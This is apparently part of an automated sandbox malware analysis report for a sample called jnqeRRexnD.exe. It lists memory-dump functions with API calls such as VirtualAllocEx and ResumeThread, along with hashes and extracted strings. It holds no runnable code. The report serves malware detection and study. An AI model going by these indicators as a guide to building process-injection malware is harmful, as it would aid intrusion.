Instruction ID: f621ae16d4440af416552c01ffe905ef7b9765884dbd31f45f54427737e74a55
Opcode Fuzzy Hash: d1b81f3b909fd6d3cce6a8d01950647becf53121f6bfac67982d51c47f1dd584
Instruction Fuzzy Hash: 9121E6B5D002089FDB10CF9AD584ADEFBF5FB48320F14841AE918A3350D374A940DFA4

Function 069A7C20 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 069A7C96

Memory Dump Source

Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 902bc345201cc8e2a7710108e89cfebdf80a37190585418f87b60343c42d66b7
Instruction ID: 40d9559efadd33dc8772489e5d438b1b7bcda8327a39ad61059aaebd4ac88e85
Opcode Fuzzy Hash: 902bc345201cc8e2a7710108e89cfebdf80a37190585418f87b60343c42d66b7
Instruction Fuzzy Hash: 301147769003499FCB20DFAAC845ADFBFF9EF48320F20841AE519AB250C7759545DFA0

Function 069A7A98 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 069A7B02

Memory Dump Source

Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 994dafcf4c4fbf5c880fb1a8c506a2d8db168f709d4a5c6426ab8710aa0f8f14
Instruction ID: c84352c6d0c52e9136ee378f5ee2bf99bc3daeed90ca4165cb6962efc5ec0cf5
Opcode Fuzzy Hash: 994dafcf4c4fbf5c880fb1a8c506a2d8db168f709d4a5c6426ab8710aa0f8f14
Instruction Fuzzy Hash: 27114CB5D003499BCB10DFAAC845BDFFBF9AF48324F20841AD419A7340C7755544CBA0

Function 069A7C28 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 069A7C96

Memory Dump Source

Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f3f2008242323988b66ff44bbf15cab06ee3a8a1acbfffa9290125ffcf7f7332
Instruction ID: 4c687382d3063f7c3d663f9af26bdc813a0a15b780a1b69ac22f46704770ba51
Opcode Fuzzy Hash: f3f2008242323988b66ff44bbf15cab06ee3a8a1acbfffa9290125ffcf7f7332
Instruction Fuzzy Hash: 03113A759003499FCF10DFAAC845ADEBFF5EF48320F248419E519A7250C7759540DFA0

Function 069AB598 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 069AB5FD

Memory Dump Source

Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: df6fe67315aa0a27d85401b41b06505037300f2b98285c2c6023e75da1bdd558
Instruction ID: ea08b16adb8b77c0c046a61bf6313407d125f211bea047767934ccda99263b14
Opcode Fuzzy Hash: df6fe67315aa0a27d85401b41b06505037300f2b98285c2c6023e75da1bdd558
Instruction Fuzzy Hash: 7B1125B58013499FCB10CF9AD885BDEBFF8EB48324F20841AE514A7700C375A544CFA1

Function 069A7AA0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 069A7B02

Memory Dump Source

Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 04535100f15c7cb684c6bc93bfdb17a07bcbca27f8e234bfd0f770055162e666
Instruction ID: e1b28b3a4e7c1c25522b035b0994b1b8fd648bd0bc5afbe1a08071f172a85492
Opcode Fuzzy Hash: 04535100f15c7cb684c6bc93bfdb17a07bcbca27f8e234bfd0f770055162e666
Instruction Fuzzy Hash: 911128B1D003498BDB20DFAAC44579EFBF9AB88324F24841AD519A7240C6756944CBA0

Function 069A63E0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 069AB5FD

Memory Dump Source

Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 8c4da210fc05877bfcacd836c0e0c0fbb62ea13a1f3406e9f44523ff3e0708ca
Instruction ID: 769a6d9b1bfa854ba522416c401d07c3f67e5e069c2a078ad572596698032cc7
Opcode Fuzzy Hash: 8c4da210fc05877bfcacd836c0e0c0fbb62ea13a1f3406e9f44523ff3e0708ca
Instruction Fuzzy Hash: 8E1122B58003489FDB60DF9AC984BDEBBF8EB48324F20841AE518A3700C374A940CFA0

Function 00BDAEF8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00BDAF5E

Memory Dump Source

Source File: 0000000B.00000002.2160163531.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_bd0000_jnqeRRexnD.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 718cfbb2f0f3a29deef9c308a44972754ad65e91149b6608962e9c4fbcde9186
Instruction ID: 51d62e88d132b1565025809e685e4c2d220162cd6c6ee260c92a2efa4b4d9afc
Opcode Fuzzy Hash: 718cfbb2f0f3a29deef9c308a44972754ad65e91149b6608962e9c4fbcde9186
Instruction Fuzzy Hash: F311DFB6C002498FCB10CF9AC444A9EFBF9EB88324F24849AD419A7710D379A545CFA1

Function 0086D1FC Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2159028242.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_86d000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 790c982d2b04af839e3c984dd6d087cb8a27076d254bfd0d83918c65ba84027e
Instruction ID: c32aeb87739e4f06214723aab947bd5bc9758c738b27c00665566fd64f5f2441
Opcode Fuzzy Hash: 790c982d2b04af839e3c984dd6d087cb8a27076d254bfd0d83918c65ba84027e
Instruction Fuzzy Hash: 4B21F1B2A04304DFCB05DF14D9D0B26BB66FB88314F24C569ED098B346C336E856DBA1

Function 0086D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2159028242.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_86d000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 327fe3ad16814b916fa8910def7d1c38ce3846d4b9845a3a6c73ab314e8989d4
Instruction ID: 9d59c89a8d5c81e659841f8cb86e98c1b34293b95c808b3d1bc9cc6dedeac98f
Opcode Fuzzy Hash: 327fe3ad16814b916fa8910def7d1c38ce3846d4b9845a3a6c73ab314e8989d4
Instruction Fuzzy Hash: 592124B1A04344DFCB04DF04C9C0F26BB65FB98324F24C569E9098B256C736E846CAA1

Function 0087D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2159137655.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_87d000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6afd2274d96a6342ec727db2b4500157338c0690d7d2186c57fff607aa5e1007
Instruction ID: fe3760ee03ae2393a5acca8f24bf84e567e2f6ffe1660ca89f267ca49eea59a2
Opcode Fuzzy Hash: 6afd2274d96a6342ec727db2b4500157338c0690d7d2186c57fff607aa5e1007
Instruction Fuzzy Hash: FB21C1B1614304AFDB05DF14D5C0B26BB75FF84318F24C569E94D8B25AC336E846DA61

Function 0087D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2159137655.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_87d000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d8cf38cc275b897b956dbecc290130fe5616cfc98415d5e3a993d9e92d7891e
Instruction ID: 0b82cf37dc8daf5d671f23dc148e5965e2728fc8ebbf669c05d3024cc63fe816
Opcode Fuzzy Hash: 0d8cf38cc275b897b956dbecc290130fe5616cfc98415d5e3a993d9e92d7891e
Instruction Fuzzy Hash: A221CFB56047049FCB14DF14D980B26BB75FB84318F24C969E90E8B29AC33AD847CA61

Function 0086D1F7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2159028242.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_86d000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0198dffcca54c8a327979ca184e18e1179e26769679eb7287e54d642110c921c
Instruction ID: f86ccfe5c422f51132740e008410ac0912d8231aa3ed092e74a5fe66064f475a
Opcode Fuzzy Hash: 0198dffcca54c8a327979ca184e18e1179e26769679eb7287e54d642110c921c
Instruction Fuzzy Hash: 09219D76904240DFDB16CF50D9C4B16BF62FB84314F24C5A9DD094B656C33AE86ACBA1

Function 0086D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2159028242.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_86d000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction ID: 6f5f32a6d1271c9d6d84aafd67363d585434f58f5f176df7c01614a8e70ead3d
Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction Fuzzy Hash: 1111E172904340CFCB12CF00D5C0B16BF72FB94324F24C2A9D9094B656C33AE85ACBA1

Function 0087D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2159137655.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_87d000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction ID: f7620eb85aafb9db2d789c3fd128fae872df485902a39bf68a5db1f807bf336f
Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction Fuzzy Hash: 4711BB75504780CFCB11CF14D5C4B15BBB2FB84318F28C6AAD80D8B65AC33AD84ACBA2

Function 0087D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2159137655.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_87d000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction ID: 5a144196806037828d115823008e15df8125562e18d650ad5720593acb5bf40c
Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction Fuzzy Hash: DC118B75504380DFDB16CF14D5C4B15BBB2FF84314F28C6AAD8498B69AC33AE84ACB61

Function 0086D759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2159028242.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_86d000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e26676d8b08e28b17bdfd20fb190bb9d437ce3209c43814980d38d15679dc87
Instruction ID: 2d6fa8292551de2e4fe964ed7968a562293d1001337158e18e302d3bfeb815f7
Opcode Fuzzy Hash: 4e26676d8b08e28b17bdfd20fb190bb9d437ce3209c43814980d38d15679dc87
Instruction Fuzzy Hash: BA01DB71A053449AE7104E25DCC4B66FFE8FF51364F18C85AED098E286C7799C40D772

Function 0086D758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2159028242.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_86d000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b70e809b9ec3e15e31df2098a2521aaff6b3db0fe8fa445fbb789accfa6f16e1
Instruction ID: c5ac48e5b447196511c4bb9a794a4447ac30e7886cb1832bc67b8dd18bbbbdab
Opcode Fuzzy Hash: b70e809b9ec3e15e31df2098a2521aaff6b3db0fe8fa445fbb789accfa6f16e1
Instruction Fuzzy Hash: 67F062729043449EE7208E16DDC4B62FFE8EF51734F18C45AED088A286C379AC44CBB1

Analysis Process: jnqeRRexnD.exePID: 6448, Parent PID: 2820COMMON

Execution Graph

Execution Coverage:	16.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	10.4%
Total number of Nodes:	48
Total number of Limit Nodes:	9

Executed Functions

Function 01667118 Relevance: 6.6, Strings: 5, Instructions: 390
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(osq, xrefs: 01667220
(osq, xrefs: 01667212
(osq, xrefs: 0166753D
,wq, xrefs: 01667298
,wq, xrefs: 0166728A

Memory Dump Source

Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID: (osq$(osq$(osq$,wq$,wq
API String ID: 0-1903262254
Opcode ID: 642c0b534f542e87fcf525cfc283897f5c125b6181d866c29651d59508e8534c
Instruction ID: f2563a33bc674ab9a9e1c2b6164d0e1b69ca78892db20aafe459a2b9bf0590be
Opcode Fuzzy Hash: 642c0b534f542e87fcf525cfc283897f5c125b6181d866c29651d59508e8534c
Instruction Fuzzy Hash: 2CF13D70A01159CFDB15CF69CC84AADBBBABF88318F558069E905EB365DB30ED41CB50

Function 0166C146 Relevance: 6.5, Strings: 5, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHsq, xrefs: 0166C3EF
0ozp, xrefs: 0166C20A
Ljzp, xrefs: 0166C377
PHsq, xrefs: 0166C400
Ljzp, xrefs: 0166C38D

Memory Dump Source

Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID: 0ozp$Ljzp$Ljzp$PHsq$PHsq
API String ID: 0-2658838366
Opcode ID: d1e5f0613efede692e70ed8fa826111a5068c3bdd24d245ea50a39b21e02cb93
Instruction ID: 3aced2d7615505e55709427e8efe4b8f9f43909133df287ea95eef17217fee0a
Opcode Fuzzy Hash: d1e5f0613efede692e70ed8fa826111a5068c3bdd24d245ea50a39b21e02cb93
Instruction Fuzzy Hash: FCA1E674E00618DFDB14CFA9D884A9DBBF6BF89300F14C06AE849AB365DB349981CF50

Function 01665362 Relevance: 6.4, Strings: 5, Instructions: 193
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0ozp, xrefs: 016653E2
Ljzp, xrefs: 01665550
PHsq, xrefs: 016655D9
PHsq, xrefs: 016655C8
Ljzp, xrefs: 01665566

Memory Dump Source

Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID: 0ozp$Ljzp$Ljzp$PHsq$PHsq
API String ID: 0-2658838366
Opcode ID: 0a7aba432b6ee4c5dfc5fc0669dd0601bc2113a07188574c5813892b4882647e
Instruction ID: d3fb8839c98fcfd6653022eb40dfed3f085d2ecf472970d9e00fb5829788c7ab
Opcode Fuzzy Hash: 0a7aba432b6ee4c5dfc5fc0669dd0601bc2113a07188574c5813892b4882647e
Instruction Fuzzy Hash: F491D474E01218CFDB14CFA9D984A9DBBF2BF88300F14D0A9E819AB365DB349985CF50

Function 0166C468 Relevance: 6.4, Strings: 5, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHsq, xrefs: 0166C6BF
PHsq, xrefs: 0166C6D0
Ljzp, xrefs: 0166C647
0ozp, xrefs: 0166C4DA
Ljzp, xrefs: 0166C65D

Memory Dump Source

Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID: 0ozp$Ljzp$Ljzp$PHsq$PHsq
API String ID: 0-2658838366
Opcode ID: fafa691a17e077950d900cbd828bd27c7832fc92d092bd07521f64ab0eea732c
Instruction ID: 5f536b12f412238eb48a9f0fcc854045353a17854f10c24989087ffd4ece7ff1
Opcode Fuzzy Hash: fafa691a17e077950d900cbd828bd27c7832fc92d092bd07521f64ab0eea732c
Instruction Fuzzy Hash: 5781D474E00658DFDB14CFAAD884A9DBBF2BF88300F14D069E859AB365DB349981CF50

Function 0166CA08 Relevance: 6.4, Strings: 5, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Ljzp, xrefs: 0166CBE7
0ozp, xrefs: 0166CA7A
Ljzp, xrefs: 0166CBFD
PHsq, xrefs: 0166CC70
PHsq, xrefs: 0166CC5F

Memory Dump Source

Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID: 0ozp$Ljzp$Ljzp$PHsq$PHsq
API String ID: 0-2658838366
Opcode ID: fb5e627d082547e189743c73a3222ff16c6fd68aa0201366a6dadc8a1d5225dd
Instruction ID: 821f88b1a4d2b044b9fecaf05714faabed125b9dbd147c08a3dfcf9cecce88c4
Opcode Fuzzy Hash: fb5e627d082547e189743c73a3222ff16c6fd68aa0201366a6dadc8a1d5225dd
Instruction Fuzzy Hash: 6C81D474E00618DFDB14DFAAD884A9DBBF2BF88310F14D069E859AB365DB349981CF50

Function 0166D278 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Ljzp, xrefs: 0166D46D
PHsq, xrefs: 0166D4CF
0ozp, xrefs: 0166D2EA
Ljzp, xrefs: 0166D457
PHsq, xrefs: 0166D4E0

Memory Dump Source

Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID: 0ozp$Ljzp$Ljzp$PHsq$PHsq
API String ID: 0-2658838366
Opcode ID: 3fbf1890723423841d648ca47938e4b69780684b8e56fbaac932eccf5874be1c
Instruction ID: 33b1614e8dad04be7c1ec7c1e3983c64904e442f33502daacd5a829b47b220a6
Opcode Fuzzy Hash: 3fbf1890723423841d648ca47938e4b69780684b8e56fbaac932eccf5874be1c
Instruction Fuzzy Hash: E881B274E01218CFDB14DFAAD984A9DBBF6BF88300F14C069E459AB365DB309981CF10

Function 0166C738 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Ljzp, xrefs: 0166C917
PHsq, xrefs: 0166C9A0
Ljzp, xrefs: 0166C92D
0ozp, xrefs: 0166C7AA
PHsq, xrefs: 0166C98F

Memory Dump Source

Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID: 0ozp$Ljzp$Ljzp$PHsq$PHsq
API String ID: 0-2658838366
Opcode ID: f782502597bf6e5f341679f5a5138e6967770f6b1e9caf15ebe9d499d5eed8b8
Instruction ID: 701915f146aab2b7732642bc847e661d964f7cfb21505363a547b5bee40aa5d3
Opcode Fuzzy Hash: f782502597bf6e5f341679f5a5138e6967770f6b1e9caf15ebe9d499d5eed8b8
Instruction Fuzzy Hash: CA81C374E00618DFDB14DFAAD984A9DBBF2BF88310F10C069E459AB365DB349982CF50

Function 0166CCD8 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Ljzp, xrefs: 0166CECD
PHsq, xrefs: 0166CF2F
0ozp, xrefs: 0166CD4A
PHsq, xrefs: 0166CF40
Ljzp, xrefs: 0166CEB7

Memory Dump Source

Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID: 0ozp$Ljzp$Ljzp$PHsq$PHsq
API String ID: 0-2658838366
Opcode ID: 001b533b6adc9272da9feedbf619a350de59990f3e6ff8a5b14ad5c0f6d79148
Instruction ID: ba42c9f951315d60e969d6cbad80531fe98a0461f6e258ec1aa499a844d12418
Opcode Fuzzy Hash: 001b533b6adc9272da9feedbf619a350de59990f3e6ff8a5b14ad5c0f6d79148
Instruction Fuzzy Hash: EC81B374E00618DFDB14DFAAD984A9DBBF2BF88300F14D069E459AB365DB349981CF50

Function 0166CFAA Relevance: 6.4, Strings: 5, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHsq, xrefs: 0166D210
0ozp, xrefs: 0166D01A
PHsq, xrefs: 0166D1FF
Ljzp, xrefs: 0166D187
Ljzp, xrefs: 0166D19D

Memory Dump Source

Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID: 0ozp$Ljzp$Ljzp$PHsq$PHsq
API String ID: 0-2658838366
Opcode ID: 1fe62f9bcd9439cde700b36f3e403f6874485fd91d47196d6a79ea6954225a72
Instruction ID: b9ee583e0154f873d2beedf8bae062617cc1a0eeec6f627539d418ca06f0b892
Opcode Fuzzy Hash: 1fe62f9bcd9439cde700b36f3e403f6874485fd91d47196d6a79ea6954225a72
Instruction Fuzzy Hash: 3181A074E00218CFDB14DFAAD884A9DBBF6BF88310F14C069E459AB365DB749985CF10

Function 016629EC Relevance: 5.3, Strings: 4, Instructions: 315
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xwq, xrefs: 01662A9E
Xwq, xrefs: 01662BA4
Xwq, xrefs: 01662B57
Xwq, xrefs: 01662AD8

Memory Dump Source

Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID: Xwq$Xwq$Xwq$Xwq
API String ID: 0-1964751375
Opcode ID: 6bfebef4688648dd299646660ad7130e1a8fb78440a649fe23834eb826142de5
Instruction ID: 0426b9b890ea54f4540cfcceea00f415c1f9ca83b1bc3ed3ffcda2cf45cbb892
Opcode Fuzzy Hash: 6bfebef4688648dd299646660ad7130e1a8fb78440a649fe23834eb826142de5
Instruction Fuzzy Hash: 69A1C272E04719CBCB658FB8CC952AEBBB5FF44320F10456DC946A7245EB349A42CB92

Function 0166A088 Relevance: 3.4, Strings: 2, Instructions: 894COMMON

Download Yara Rule

Strings

(osq, xrefs: 0166A518
4'sq, xrefs: 0166AB13

Memory Dump Source

Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID: (osq$4'sq
API String ID: 0-2651803416
Opcode ID: 3d265116eae05bed1afac1ecf6fb9cd3bb2ca60c28597265278af733f5ac470a
Instruction ID: 5b3d6366cf5e7300f247ac18f6fd764fc79e742fdd3d455f8cecdea1d5780b37
Opcode Fuzzy Hash: 3d265116eae05bed1afac1ecf6fb9cd3bb2ca60c28597265278af733f5ac470a
Instruction Fuzzy Hash: 41825D75600209DFCB15CFA8C984AAEBBBAFF88310F15855AE905EB366D734ED41CB50

Function 016669A0 Relevance: 3.0, Strings: 2, Instructions: 514
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(osq, xrefs: 01666EDA
Hwq, xrefs: 01666DA6

Memory Dump Source

Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID: (osq$Hwq
API String ID: 0-1668724233
Opcode ID: 5b02245017a4d391031d90744d654dad803d0d515dca9e6b196de434a97f9688
Instruction ID: b7244b946f983c5cb9057e5f8a0ca784890ae0488a12338562284d6bd59ffeeb
Opcode Fuzzy Hash: 5b02245017a4d391031d90744d654dad803d0d515dca9e6b196de434a97f9688
Instruction Fuzzy Hash: DD126CB1A002199FDB14DF69D894BAEBBB6FF88300F108529E905EB355DF349D42CB90

Function 01663B8C Relevance: 2.7, Strings: 2, Instructions: 200COMMON

Download Yara Rule

Strings

Xwq, xrefs: 01663CCD
Xwq, xrefs: 01663CF6

Memory Dump Source

Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID: Xwq$Xwq
API String ID: 0-2617233878
Opcode ID: 067fce5f963fc87054fe2d03beab6939650c74b889dddf7e80918ee88e7e1db9
Instruction ID: 44e773c7efe3cf8745123ac85f7b51d773dfb2bfaab38876e1d89a31ba8fe487
Opcode Fuzzy Hash: 067fce5f963fc87054fe2d03beab6939650c74b889dddf7e80918ee88e7e1db9
Instruction Fuzzy Hash: 76510033B05751CBDB259B698C912BBBBBABB90210F44487ECC46C7345EB78C9028761

Function 06DB9548 Relevance: 1.9, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4529745815.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6db0000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee742452c38f11acb6b6451e2ae311dd52b599378a55f1a8689d6f3063917ef4
Instruction ID: b1a490ae82ee2f47a6c0f735808e554c66d9bb6dc1759664b24eaec063b81298
Opcode Fuzzy Hash: ee742452c38f11acb6b6451e2ae311dd52b599378a55f1a8689d6f3063917ef4
Instruction Fuzzy Hash: D7F10474E01218CFDB54CFA9C894B9DBBB2BF89300F10D1A9E809AB355DB349986CF50

Function 0166E97A Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

